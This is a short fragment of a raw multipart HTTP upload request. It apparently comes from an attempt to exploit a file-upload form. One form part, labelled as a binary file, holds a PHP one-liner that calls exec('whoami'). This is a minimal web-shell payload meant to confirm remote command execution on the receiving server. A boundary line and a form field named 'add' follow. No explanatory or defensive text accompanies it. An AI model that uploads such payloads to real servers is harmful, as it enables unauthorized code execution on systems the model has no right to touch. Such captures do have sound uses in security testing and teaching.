Content-Type: application/octet-stream
<?php echo exec("whoami"); ?>
------WebKitFormBoundaryrmynB2CmGO6vwFpO
Content-Disposition: form-data; name="add"